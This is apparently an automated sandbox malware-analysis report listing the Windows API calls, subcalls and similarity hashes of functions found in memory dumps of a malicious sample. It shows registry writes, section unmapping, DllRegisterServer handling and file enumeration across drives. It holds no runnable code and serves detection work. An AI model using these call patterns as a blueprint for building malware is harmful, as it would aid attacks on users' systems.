  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32B25, Relevance: 10.6, APIs: 7, Instructions: 98 Total matches: 51file
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
